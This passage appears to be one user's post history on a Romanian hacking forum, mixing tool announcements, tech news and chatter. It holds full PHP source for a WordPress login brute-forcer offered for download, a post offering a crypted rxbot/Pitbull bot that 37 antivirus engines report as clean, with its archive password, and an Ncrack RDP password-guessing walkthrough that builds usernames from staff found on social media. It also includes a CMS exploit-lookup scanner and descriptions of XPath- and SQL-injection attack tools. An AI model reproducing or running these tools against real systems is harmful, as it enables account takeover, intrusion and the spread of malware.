Jump to content

Fi8sVrs

Active Members
  • Posts

    3206
  • Joined

  • Days Won

    87

Everything posted by Fi8sVrs

  1. playlist.ro
  2. primul venit, primul servit?
  3. Cura is a mobile phone application bundle of remote systems administration tools. It provides a personalized terminal emulator, a syslog module that allows for reading logs directly from a server, a SysMonitor module that visually graphs CPU and RAM usage percentages, access to Nmap, and Server Stats will offer general server information like its Vitals, Hardware information, Memory information, processes, and so on. A security feature will be implemented that allows users to have Cura's database completely wiped upon them sending the compromised phone a secret pattern of their choosing (e.g. send an SMS message containing "phone has been stolen!" to your Android phone to wipe Cura's database, and receive the location of the compromised phone as an SMS to your emergency phone number or as an email to your emergency email address). Changes: This release satisfies all the the tasks promised: terminal, syslog reader, SysMonitor (for CPU and RAM), Nmap, and server stats. In addition, there's the security feature (an SMS can wipe Cura's database (the phone's location is sent back)). It works for Android 2.3.3 (Gingerbread) and above. Download Cura 1.0 ? Packet Storm
  4. youtube views, subscribers, comments, likes; facebook likes, fans, subscribers.
  5. File Name: CUSTOM_101m2.exe File Size: 634980 Bytes MD5: 62c1dc4a6e09a9de77613abc2443d074 SHA1: 07363658dea4e08e949857b59ac86edfc64eda0f Detection: 0 of 37 (0%) Status: CLEAN AVG Free - Clean! ArcaVir - Clean! Avast 5 - Clean! Avast - Clean! AntiVir (Avira) - Clean! BitDefender - Clean! VirusBuster Internet Security - Clean! Clam Antivirus - Clean! COMODO Internet Security - Clean! Dr.Web - Clean! eTrust-Vet - Clean! F-PROT Antivirus - Clean! F-Secure Internet Security - Clean! G Data - Clean! IKARUS Security - Clean! Kaspersky Antivirus - Clean! McAfee - Clean! MS Security Essentials - Clean! ESET NOD32 - Clean! Norman - Clean! Norton Antivirus - Clean! Panda Security - Clean! A-Squared - Clean! Quick Heal Antivirus - Clean! Rising Antivirus - Clean! Solo Antivirus - Clean! Sophos - Clean! Trend Micro Internet Security - Clean! VBA32 Antivirus - Clean! Vexira Antivirus - Clean! Webroot Internet Security - Clean! Zoner AntiVirus - Clean! Ad-Aware - Clean! AhnLab V3 Internet Security - Clean! BullGuard - Clean! Immunet Antivirus - Clean! VIPRE - Clean! rar pass: {-98,-124,74,-126,-62,68,0}; Decriptarea mod, respectiv: rxbot/Pitbull (Cifra) download via rootarea
  6. http://www.mediafire.com/?bebma0vbh1w31eb http://www.mediafire.com/?v1nm68ui45b71by http://www.mediafire.com/?qf39isbqud6l8sw http://www.mediafire.com/?3gmmu4o50yppjje http://www.mediafire.com/?jkcxcce4oobc9w9 http://www.mediafire.com/?n5b9mud3d8v4oid http://www.mediafire.com/?wpfox8sfu2rnhkd http://www.mediafire.com/?d4cc8sw5a4ct766 http://www.mediafire.com/?2f6943de4kcmstv http://www.mediafire.com/?cpzaabkaz4b2jn3 http://www.mediafire.com/?6jsmu8camlkks5y http://www.mediafire.com/?rwa0rcegwcii0fj http://www.mediafire.com/?s47ma6j3gbkpkko http://www.mediafire.com/?evbjq1bmcy3175r http://www.mediafire.com/?c1njusq3gk05p8m http://www.mediafire.com/?84q28ft3z70o7sl http://www.mediafire.com/?3s1l4miam52pjy6 http://www.mediafire.com/?k6nabo06u8jqhur http://www.mediafire.com/?7p4bicilto3rzmb http://www.mediafire.com/?11pmca1sd7h3k6r http://www.mediafire.com/?l3hxi0h4lgdq0sx http://www.mediafire.com/?1s2j2ocrc2rv9o0 http://www.mediafire.com/?u1a12ive0962pi4 http://www.mediafire.com/?naimi5iqm858iss http://www.mediafire.com/?r51zdz5ek3m22jp http://www.mediafire.com/?icdro42rd2lieh9 http://www.mediafire.com/?ykrh99g5q4h7olr http://www.mediafire.com/?dj9lm9l07z9nndj http://www.mediafire.com/?c3ea6kyw2owfzgn http://www.mediafire.com/?h55ts54fv1z0u5x http://www.mediafire.com/?9vi4wbkoc2yhnxa http://www.mediafire.com/?k1dy2x9apd2joek http://www.mediafire.com/?3bchz0bv373lrxd http://www.mediafire.com/?mmr6onclrx5x7bu http://www.mediafire.com/?5c2cghv3gh9213o http://www.mediafire.com/?xbjgk5a5ivb1cff http://www.mediafire.com/?bujh1stoblub95z http://www.mediafire.com/?c67u75pgmv5en7o http://www.mediafire.com/?2hla1637m2tt152 http://www.mediafire.com/?cep9kef3dvvk9c0 http://www.mediafire.com/?fcd54b8t8dwzmes http://www.mediafire.com/?g83gb2p2kcut2kx http://www.mediafire.com/?o2xw44tgvzjnb4y http://www.mediafire.com/?maswyebb2crtg35 http://www.mediafire.com/?hny1tv45o9wlz97 http://www.mediafire.com/?hny1tv45o9wlz97 http://www.mediafire.com/?3cqt8to4jde7b69 http://www.mediafire.com/?2fyxnbv7bb6wazt http://www.mediafire.com/?1l91k1szbua2u0q http://www.mediafire.com/?sr12ed4en7tawyw http://www.mediafire.com/?fexif1cs31pjf03 http://www.mediafire.com/?gc6sang2dn5h65m http://www.mediafire.com/?5ggsxk3htrn8cbk http://www.mediafire.com/?v5ljossglspus5d Source r00tw0rm
  7. May 21, 2012—The Nmap Project is pleased to announce the immediate, free availability of the Nmap Security Scanner version 6.00 from Nmap - Free Security Scanner For Network Exploration & Security Audits.. It is the product of almost three years of work, 3,924 code commits, and more than a dozen point releases since the big Nmap 5 release in July 2009. Nmap 6 includes a more powerful Nmap Scripting Engine, 289 new scripts, better web scanning, full IPv6 support, the Nping packet prober, faster scans, and much more! We recommend that all current users upgrade. Before we go into the detailed changes, here are the top 6 improvements in Nmap 6: 1. NSE Enhanced The Nmap Scripting Engine (NSE) has exploded in popularity and capabilities. This modular system allows users to automate a wide variety of networking tasks, from querying network applications for configuration information to vulnerability detection and advanced host discovery. The script count has grown from 59 in Nmap 5 to 348 in Nmap 6, and all of them are documented and categorized in our NSE Documentation Portal. The underlying NSE infrastructure has improved dramatically as well. [More details] 2. Better Web Scanning As the Internet has grown more web-centric, Nmap has developed web scanning capabilities to keep pace. When Nmap was first released in 1997, most of the network services offered by a server listened on individual TCP or UDP ports and could be found with a simple port scan. Now, applications are just as commonly accessed via URL path instead, all sharing a web server listening on a single port. Nmap now includes many techniques for enumerating those applications, as well as performing a wide variety of other HTTP tasks, from web site spidering to brute force authentication cracking. Technologies such as SSL encryption, HTTP pipelining, and caching mechanisms are well supported. [More details] 3. Full IPv6 Support Given the exhaustion of available IPv4 addresses, the Internet community is trying to move to IPv6. Nmap has been a leader in the transition, offering basic IPv6 support since 2002. But basic support isn't enough, so we spent many months ensuring that Nmap version 6 contains full support for IP version 6. And we released it just in time for the World IPv6 Launch. We've created a new IPv6 OS detection system, advanced host discovery, raw-packet IPv6 port scanning, and many NSE scripts for IPv6-related protocols. It's easy to use too—just specify the -6 argument along with IPv6 target IP addresses or DNS records. In addition, all of our web sites are now accessible via IPv6. For example, Nmap.org can be found at 2600:3c01::f03c:91ff:fe96:967c. [More details] 4. New Nping Tool The newest member of the Nmap suite of networking and security tools is Nping, an open source tool for network packet generation, response analysis and response time measurement. Nping can generate network packets for a wide range of protocols, allowing full control over protocol headers. While Nping can be used as a simple ping utility to detect active hosts, it can also be used as a raw packet generator for network stack stress testing, ARP poisoning, Denial of Service attacks, route tracing, etc. Nping's novel echo mode lets users see how packets change in transit between the source and destination hosts. That's a great way to understand firewall rules, detect packet corruption, and more. [More details] 5. Better Zenmap GUI & results viewer While Nmap started out as a command-line tool and many (possibly most) users still use it that way, we've also developed an enhanced GUI and results viewer named Zenmap. One addition since Nmap 5 is a “filter hosts” feature which allows you to see only the hosts which match your criteria (e.g. Linux boxes, hosts running Apache, etc.) We've also localized the GUI to support five languages besides English. A new script selection interface helps you find and execute Nmap NSE scripts. It even tells you what arguments each script supports. [More details] 6. Faster scans In Nmap's 15-year history, performance has always been a top priority. Whether scanning one target or a million, users want scans to run as fast as possible without sacrificing accuracy. Since Nmap 5 we've rewritten the traceroute system for higher performance and increased the allowed parallelism of the Nmap Scripting Engine and version detection subsystems. We also performed an intense memory audit which reduced peak consumption during our benchmark scan by 90%. We made many improvements to Zenmap data structures and algorithms as well so that it can now handle large enterprise scans with ease. [More details] Screen Shots Nmap 6 provides a wealth of information about remote systems, as shown in this sample scan against a machine we maintain for scan testing purposes (scanme.nmap.org): Here is an example using Zenmap against a couple of production web servers (Nmap.org and Reddit): Perhaps the most visually appealing aspect of Zenmap is its network topology mapper. Here it is being used to interactively explore the routes between a source machine and more than a dozen popular web sites: Download and Updates nmap.org
  8. Name:Napsters Wordpress Brute Forcer Coded in: PHP Develop by: Dr-Freak Using this you can brute any wordpress blog. You can add your passwords list to brute in forum in the script or even just upload you big list in same directory and rename it to napster.txt. It will also make a file nap.txt in which you have all passowrds combination you try so far,this is just to keep track which was last password attempt to check by the script. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>W0rdPress Brute Forcer [#] Napsters Cr3w</title> <style type="text/css"> <!-- body { background-color: #000000; } .style2 {color: #FF0000} .style3 {font-family: Verdana, Arial, Helvetica, sans-serif} .style4 { font-size: 67px; font-weight: bold; color: #FFFFFF; font-family: Arial, Helvetica, sans-serif; } .style7 { font-weight: bold; color: #FFFFFF; font-size: 67px; font-family: Verdana, Arial, Helvetica, sans-serif; } .style8 { font-size: 24; color: #FF0000; } .style67 { font-size: 24; color: #FFFFFF; } --> </style></head> <body> <div align="center" class="style3"> <h1 class="style7">WordPress Brute Forcer</h1> <p><span class="style4"><span class="style2">Napsters Cr3w & 0xf</span></span></p> <p><span class="style8">Develop By Dr-Freak</span></p> </div> </body> <span class="style67"><center>Gr3tx T0 Virus Hima . Red Virus . MrCreepy . The Lions Heart . Max0xf . Seeker . Hex786 . Mkhan Swati . All 0xf members</center></span> <p> </p> </html> <?php /** * @author dr.freak *@copyright 2012 */ function login ($url,$user,$pass){ $login = $url.'/wp-login.php'; $to = $url.'/wp-admin'; $data = array('log'=>$user,'pwd'=>$pass,'rememberme'=>'forever','wp-submit'=>'Log In','redirect_to'=>$to,'testcookie'=>1); $ch=curl_init(); curl_setopt($ch,CURLOPT_URL,$login); curl_setopt($ch,CURLOPT_POST,true); curl_setopt($ch,CURLOPT_POSTFIELDS,$data); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); $resutl = curl_exec($ch); curl_close($ch); if(eregi ('<div id="login_error">',$resutl)) { return false; }else{ return true; } } function GetIP() { if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) $ip = getenv("HTTP_CLIENT_IP"); else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) $ip = getenv("HTTP_X_FORWARDED_FOR"); else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) $ip = getenv("REMOTE_ADDR"); else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) $ip = $_SERVER['REMOTE_ADDR']; else $ip = "unknown"; return($ip); } $a=GetIP(); echo '<span class="style8"><center>Your IP : '; echo "$a<br></center></span>"; if (!isset($_GET['star'])) { echo '<center><form method="post" action="?star"> <span class="style8">Target </span> : <input name="target" type="text" value="http://www. "size="40"><brr /> <span class="style2">Username </span> : <input name="username" type="text"><br /> <input type="checkbox" name="list" value="Yes" /> <span class="style8">[#]Tick If Y0u Want To Brute Via txt Litst </span> <span class="style8">Upload Txt List As napster.txt In Same Dir<br/> </span> <span class="style8">Passwords </span> : <br><textarea cols="50" rows="5" name="passwords"></textarea><br /> <input type="submit" value="submit"> </form></center>'; } else{ if(isset($_POST['list']) && $_POST['list'] == 'Yes') { $fileName='napster.txt'; if(file_exists($fileName)) { $file = fopen($fileName,'r'); while(!feof($file)) { $name = fgets($file); $passwords = $name; $fileName1='nap.txt'; $file1 = fopen($fileName1,'a'); fwrite( $file1, "$passwords\n"); $username = $_POST['username']; $target = $_POST['target']; if (login($target,$username,$passwords)) { echo '<span class="style8"><center>Target : '; echo " : $target <br /> Username : $username <br />Password : $passwords<br/></span>"; break; } } fclose($file); } } else { $passwords = $_POST['passwords']; $username = $_POST['username']; $target = $_POST['target']; $ex = explode("\n",$passwords); foreach($ex as $passwords) { $fileName1='nap.txt'; $file1 = fopen($fileName1,'a'); fwrite( $file1, "$passwords\n"); if (login($target,$username,$passwords)) { echo '<span class="style8"><center>Target : '; echo " : $target <br /> Username : $username <br />Password : $passwords<br/></span>"; break; } } } } echo '<br><span class="style67"><center>C0ded @ Dr-Freak Labs</center></span>'; ?> Download mirror:wordpress bruteforce.php usage: target: http://example.com/blog/wp-login.php sursa: r00tw0rm.com
  9. Fi8sVrs

    CC

    report @ efrauda.ro - depunere sesizare
  10. 1337scan_v0.2.php <?php @set_time_limit(0); @error_reporting(0); /*******************************************************************************/ # Script : [+]~ 1337 Multiple CMS Scaner Online | ToolKit | v0.2 by KedAns-Dz ~[+] # Author : ked-h [ at ] hotmail [ dot ] com # Home : www.1337day.com # Greets to : Dz Offenders Cr3W - Algerian Cyber Army - Inj3ct0r Team /****************************************************************************/ // Script Functions , start ..! function ask_exploit_db($component){ $exploitdb ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$component&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve="; $result = @file_get_contents($exploitdb); if (eregi("No results",$result)) { echo"<td>Not Found</td><td><a href='http://www.google.com/search?hl=en&q=download+$component'>Download</a></td></tr>"; }else{ echo"<td><a href='$exploitdb'>Found ..!</a></td><td><--</td></tr>"; } } /**************************************************************/ /* Joomla Conf */ function get_components($site){ $source = @file_get_contents($site); preg_match_all('{option,(.*?)/}i',$source,$f); preg_match_all('{option=(.*?)(&|&|")}i',$source,$f2); preg_match_all('{/components/(.*?)/}i',$source,$f3); $arz=array_merge($f2[1],$f[1],$f3[1]); $coms=array(); if(count($arz)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";} foreach(array_unique($arz) as $x){ $coms[]=$x; } foreach($coms as $comm){ echo "<tr><td>$comm</td>"; ask_exploit_db($comm); } } /**************************************************************/ /* WP Conf */ function get_plugins($site){ $source = @file_get_contents($site); preg_match_all("#/plugins/(.*?)/#i", $source, $f); $plugins=array_unique($f[1]); if(count($plugins)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";} foreach($plugins as $plugin){ echo "<tr><td>$plugin</td>"; ask_exploit_db($plugin); } } /**************************************************************/ /* Nuke's Conf */ function get_numod($site){ $source = @file_get_contents($site); preg_match_all('{?name=(.*?)/}i',$source,$f); preg_match_all('{?name=(.*?)(&|&|l_op=")}i',$source,$f2); preg_match_all('{/modules/(.*?)/}i',$source,$f3); $arz=array_merge($f2[1],$f[1],$f3[1]); $coms=array(); if(count($arz)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";} foreach(array_unique($arz) as $x){ $coms[]=$x; } foreach($coms as $nmod){ echo "<tr><td>$nmod</td>"; ask_exploit_db($nmod); } } /*****************************************************/ /* Xoops Conf */ function get_xoomod($site){ $source = @file_get_contents($site); preg_match_all('{/modules/(.*?)/}i',$source,$f); $arz=array_merge($f[1]); $coms=array(); if(count($arz)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";} foreach(array_unique($arz) as $x){ $coms[]=$x; } foreach($coms as $xmod){ echo "<tr><td>$xmod</td>"; ask_exploit_db($xmod); } } /**************************************************************/ /* Header */ function t_header($site){ echo'<table align="center" border="1" width="50%" cellspacing="1" cellpadding="5">'; echo' <tr id="oo"> <td>Site : <a href="'.$site.'">'.$site.'</a></td> <td>Exploit-db</b></td> <td>Exploit it !</td> </tr> '; } ?> <html> <head> <meta http-equiv="Content-Language" content="fr"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title>[+]~ 1337 Multiple CMS Scaner Online | ToolKit | v0.2 by KedAns-Dz ~[+]</title> <style> body,input,table,select{background: black; font-family:Verdana,tahoma; color: #008000; font-size:12px; } a:link,a:active,a:visited{text-decoration: none;color: red;} a:hover {text-decoration: underline; color: red;} table,td,tr,#gg{ border-style:solid; text-decoration:bold; } tr:hover,td:hover{background-color: #FFFFCC; color:green;} .oo:hover{background-color: black; color:white;} </style> </head> <body> <p align="center"> </p> <p align="center"> </p> <p align="center"> </p> <form method="POST" action=""> <p align="center"> </p> <p align="center"> <font size="4">[+]~ 1337 Multiple CMS Scaner Online | ToolKit | v0.2 by KedAns-Dz ~[+]</font></p> <p align="center"> <font size="4"><br></font></p> <p align="center">Site : <input type="text" name="site" size="33" value="http://www.site.com/"><select size="1" name="what"> <option>Wordpress</option> <option>Joomla</option> <option>Nuke's</option> <option>Xoops</option> </select><input type="submit" value="Scan"></p> </form> <? // Start Scan :P ... if($_POST){ $site=strip_tags(trim($_POST['site'])); t_header($site); echo $x01 = ($_POST['what']=="Wordpress") ? get_plugins($site):""; echo $x02 = ($_POST['what']=="Joomla") ? get_components($site):""; echo $x03 = ($_POST['what']=="Nuke's") ? get_numod($site):""; echo $x04 = ($_POST['what']=="Xoops") ? get_xoomod($site):""; } ?> </table> <p align="center"> KedAns-Dz | www.1337day.com | Made in Algeria 2012 ©</p> </body> </html> <? #~End ..! All Right Reserved To ked-h [At] Hotmail [d0t] Com | and www.1337day.com ?> readme.txt.txt 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ################################################################# 1 0 [ 1337 Multiple CMS Scaner Online | ToolKit | v0.2 by KedAns-Dz ~ ] 1 1 ################################################################# 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 > Author : ked-h [ at ] hotmail [ dot ] com > Home : www.1337day.com > Greets to : Dz Offenders Cr3W - Algerian Cyber Army - Inj3ct0r Team > Copyright (c) 2012 | KedAns-Dz | Inj3ct0r 1337day Exploit Database source
  11. DISCLAIMER All information provided are for educational purposes only. It is not an endorsement to undertake hacking activity in any form (unless such activity is authorized). Tools and techniques demonstrated may be potential damaging if used inappropriately. All characters and data written on this post are fictitious. The Remote Desktop Protocol is often underestimated as a possible way to break into a system during a penetration test. Other services, such SSH and VNC are more likely to be targeted and exploited using a remote brute-force password guessing attack. For example, let’s suppose that we are in the middle of a penetration testing session at the “MEGACORP” offices and we already tried all the available remote attacks with no luck. We tried also to ARP poisoning the LAN looking to get user names and passwords, without succeeding. From a previus nmap scan log we found a few Windows machines with the RDP port open and we decided to investigate further this possibility. First of all we need some valid usernames in order to guess only the passwords rather than both. We found the names of the IT guys on varius social networking websites. Those are the key IT staff: jessie tagle julio feagins hugh duchene darmella martis lakisha mcquain ted restrepo kelly missildine Didn’t take long to create valid usernames following the common standard of using the first letter of the name and the entire surname. jtagle jfeagins hduchene dmartis lmcquain trestrepo kmissildine Software required: Linux machine, preferably Ubuntu. nmap and terminal server client, sudo apt-get install tsclient nmap build-essential checkinstall libssl-dev libssh-dev About Ncrack Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. Security professionals also rely on Ncrack when auditing their clients. Ncrack’s features include a very flexible interface granting the user full control of network operations, allowing for very sophisticated bruteforcing attacks, timing templates for ease of use, runtime interaction similar to Nmap’s and many more. Protocols supported include RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, and telnet .Ncrack - High-speed network authentication cracker Installation wget http://nmap.org/ncrack/dist/ncrack-0.4ALPHA.tar.gz mkdir /usr/local/share/ncrack tar -xzf ncrack-0.4ALPHA.tar.gz cd ncrack-0.4ALPHA ./configure make checkinstall dpkg -i ncrack_0.4ALPHA-1_i386.deb Information gathering Let’s find out what hosts in a network are up, and save them to a text list. The regular expression will parse and extract only the ip addresses from the scan. Nmap ping scan, go no further than determining if host is online nmap -sP 192.168.56.0/24 | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' > 192.168.56.0.txt Nmap fast scan with input from list of hosts/networks nmap -F -iL 192.168.56.0.txt Starting Nmap 5.21 ( http://nmap.org ) at 2011-04-10 13:15 CEST Nmap scan report for 192.168.56.10 Host is up (0.0017s latency). Not shown: 91 closed ports PORT STATE SERVICE 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 1026/tcp open LSA-or-nterm 1028/tcp open unknown 3389/tcp open ms-term-serv MAC Address: 08:00:27:09:F5:22 (Cadmus Computer Systems) Nmap scan report for 192.168.56.101 Host is up (0.014s latency). Not shown: 96 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-term-serv MAC Address: 08:00:27:C1:5D:4E (Cadmus Computer Systems) Nmap done: 55 IP addresses (55 hosts up) scanned in 98.41 seconds From the log we can see two machines with the microsoft terminal service port (3389) open, looking more in depth to the services available on the machine 192.168.56.10 we can assume that this machine might be the domain controller, and it’s worth trying to pwn it. At this point we need to create a file (my.usr) with the probable usernames previously gathered. vim my.usr jtagle jfeagins hduchene trestrepo kmissildine We need also a file (my.pwd) for the password, you can look on the internet for common passwords and wordlists. vim my.pwd somepassword passw0rd blahblah 12345678 iloveyou trustno1 At this point we run Ncrack against the 192.168.56.10 machine. ncrack -vv -U my.usr -P my.pwd 192.168.56.10:3389,CL=1 Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-10 17:24 CEST Discovered credentials on rdp://192.168.56.10:3389 'hduchene' 'passw0rd' rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon. Discovered credentials on rdp://192.168.56.10:3389 'jfeagins' 'blahblah' rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon. Discovered credentials on rdp://192.168.56.10:3389 'jtagle' '12345678' rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon. Discovered credentials on rdp://192.168.56.10:3389 'kmissildine' 'iloveyou' rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon. Discovered credentials on rdp://192.168.56.10:3389 'trestrepo' 'trustno1' rdp://192.168.56.10:3389 finished. Discovered credentials for rdp on 192.168.56.10 3389/tcp: 192.168.56.10 3389/tcp rdp: 'hduchene' 'passw0rd' 192.168.56.10 3389/tcp rdp: 'jfeagins' 'blahblah' 192.168.56.10 3389/tcp rdp: 'jtagle' '12345678' 192.168.56.10 3389/tcp rdp: 'kmissildine' 'iloveyou' 192.168.56.10 3389/tcp rdp: 'trestrepo' 'trustno1' Ncrack done: 1 service scanned in 98.00 seconds. Probes sent: 51 | timed-out: 0 | prematurely-closed: 0 Ncrack finished. We can see from the Ncrack results that all the user names gathered are valid, and also we were able to crack the login credential since they were using some weak passwords. Four of the IT staff have some kind of restrictions on the machine, except hduchene that might be the domain administrator, let’s find out. Run the terminal server client from the Linux box tsclient 192.168.56.10 use Hugh Duchene credential ‘hduchene’ ‘passw0rd’ and BINGO !!! At this point we have the control of the entire MEGACORP domain, unlimited access to all the corporate resources related to the domain. We can add users, escalate privileges of existing users, browse over the protected network resources, install backdoors and root-kits, and more and more. source: Remote desktop credentials audit with Ncrack ? Eclectic Security
  12. XCat is a command line program that aides in the exploitation of XPath injection vulnerabilities. It boasts a wide range of features and can utilize the more advanced features of the XPath 2.0 specification (pattern matching, unicode normilization and even http requests) or gracefully degrade to using XPath 1.0 if they are not available. XCat is built to exploit boolean XPath injections (Where only one bit of data can be extracted in one request) and it requires you to manually identifiy the exploit first, this does not do that for you. Features Exploits both GET and POST attacks Extracts all nodes, comments, attributes and data from the entire XML document Small and lightweight (only dependency is Twisted) Parallel requests XPath 2.0 supported (with graceful degrading to 1.0) Regex pattern matching to reduce character search space Unicode normalization Advanced data postback through HTTP (see below) Arbitrarily read XML files on the servers file system via the doc() function (see below) Source here usage: xcat.py [-h] [--method {GET,POST}] [--arg POST_ARGUMENT] [[--true TRUE_KEYWORD | --false FALSE_KEYWORD | --error ERROR_KEYWORD] [--true-code TRUE_CODE | --false-code FAIL_CODE | --error-code ERROR_CODE] [--schema-only] [--quotecharacter QUOTE_CHARACTER] [--executequery EXECUTEQUERY] [--max_search SEARCH_LIMIT] [--timeout TIMEOUT] [--stepsize STEP_SIZE] [--normalize {NFD,NFC,NFDK,NFKC}] [--xversion {1,2,auto}] [--lowercase] [--regex] [--connectback] [--connectbackip CONNECTBACK_IP] [--connectbackport CONNECTBACK_PORT] [--notfoundstring NOTFOUNDCHAR] [--fileshell] [--getcwd] [--useragent USER_AGENT] [--timeit] URL via: XCat – exploitation of XPath injection vulnerabilities ? lo0.ro
      • 1
      • Upvote
  13. We're in a bit of a rut right now when it comes to exciting hardware innovations in smartphones. When the iPhone hit the scene in 2007, it was the touchscreen that saw it revolutionize the cellular landscape. Now, the next disruptive feature appears to be just around the corner, as flexible displays are getting mass produced in a big way. Here's the heart of it, reported by The Korea Times' Kim Yoo-chul: That little tidbit certainly teases the imagination, especially when you consider that Samsung happens to be one of Apple's largest suppliers for displays and even certain chips, and that Samsung has been investing heavily in flexible display tech. Nearly a million screens is a whole hell of a lot, and a number that large has some people thinking they'll end up in a 2013 iPhone. Sure, that's entirely possible, especially if the screens are the best option on the table. But a flexible display in an iPhone does not a flexible iPhone make. While this is a strong indication that Samsung feels like its bendy OLED tech is ready for primetime, a smartphone is more than just a display and would need a flexible body and internals to match (and in a way that met Apple's high-performance demands). That, and why would Samsung simply give up what could be a defining innovation in technology when it could launch it first in a phone of its own? Samsung has the chops. Only time will tell where all those flexible displays end up. Some may just be replacing LCDs and other screens in current gadgets. Again from the same report by Korea Times, talking to Samsung Electronics Vice Chairman Kwon Oh-hyun: The flexibility of Samsung's OLED display may spark the imagination, but it sounds like the screen tech is just a superior product compared with traditional LCDs. That makes sense. They'd be more durable by virtue of having some give to them, and "thinner and brighter" never hurts. So, iPhones in 2013 with flexible displays? Entirely possible. With flexible everything else? Well, we're thinking not as likely. Even if we don't see flexible phones being sold in stores next year en masse, you can bet your boots that Samsung and others will do something with this tech, maybe even putting it into something wearable. Via: Rumor: 2013 could bring iPhones with flexible displays | DVICE
  14. n-ai voie cu ebay pe aici
  15. sunt si mai faine https://www.google.ro/search?q=adidas%20red%20caps&um=1&ie=UTF-8&hl=ro&tbm=isch&source=og&sa=N&tab=wi&ei=WIqqT8nlCIaeOtf_yOgM&biw=1124&bih=706&sei=joqqT6W7CoqDOs3K9OgM
  16. The script has following features: 1. Crawling : it can crawl all or requested number of pages on a website 2. Reverse IP Look Up : it can find all sites hosted on a shared hosting server 3. Single-Mode Attack : Crawl and find SQLi on single website and report 4. Mass-Mode Attack : Find all sites hosted on domain, crawl one-by-one, find SQLi on each one-by-one and report 5. Targets could be skipped while crawling if found too big or irrelevant. Though the script can not be paused but could be skipped to target next site. The script was developed as part of a Penetration Test assessment where Mass-Mode attack was required per clients request. The Banner # ./Domain-SQLi-finder.py Script Help ./Domain-SQLi-finder.py -h Single-Mode Attack - Targeting Single Website ./Domain-SQLi-finder.py --verbose 1 --url demo.testfire.net --crawl 50 --pages 5 --output testfire-SQLi.txt It crawls all or requested number of pages, finds injectable links, finds injecatable parameters and tests SQLi payloads against each injectable parameter Mass-Mode Attack - Targeting whole domain # ./Domain-SQLi-finder.py --verbose 1 --durl demo.testfire.net --crawl 50 --pages 5 --sites 4 --vulsites 2 --output testfire-SQLi.txt It starts with reserver IP lookup, if requested, and finds all domains hosted on shared hosting server Above you can see 3 domains were found hosted on single server Further, script would target each domain one-by-one, crawling, and testing SQLi against them Crawling.... Usage: --verbose : Value 0 would display minimum messages required. Value 1 would display complete progress. By default, vebosity is OFF --output : Output file name to hold final result. If not specified, default file with name DSQLiResults.txt will be created under same directory Single-Mode Attack: --url : takes URL as input --crawl : Number of pages on website to crawl (default is set to 500). Chilkat library is used for crawling --pages : Number of vulnerable pages (injectable parameters) to find on site (default is 0 i.e. try and find all possible vulnerable pages) Mass-Mode Attack: --durl : URL of domain --sites : Number of sites to scan on domain. Default is 0 i.e scan all. --vulsites : Number of vulnerable sites to find before scanning would stop automatically. Default is 0 i.e. try to find all vulnerable sites --dcrawl : Number of pages on website to crawl (default is set to 500) --dpages : Number of vulnerable pages to find on site. Default is 0 i.e. try and find all possible vulnerable pages. --reverse : This option has dual role - If specified on command prompt with output file name, script would consider that user has done Reverse-IP lookup already i.e. a file is existing under same directory which has result of reverse-IP lookup and script just needs to read the file. This has another benefit - script doesn't have to do reverse IP lookup whenever fired. Just generate it once and if quitting script in between while targeting domain, the next time user just needs to provide it amended reverseIP Lookup file i.e. remove the already scanned target urls from 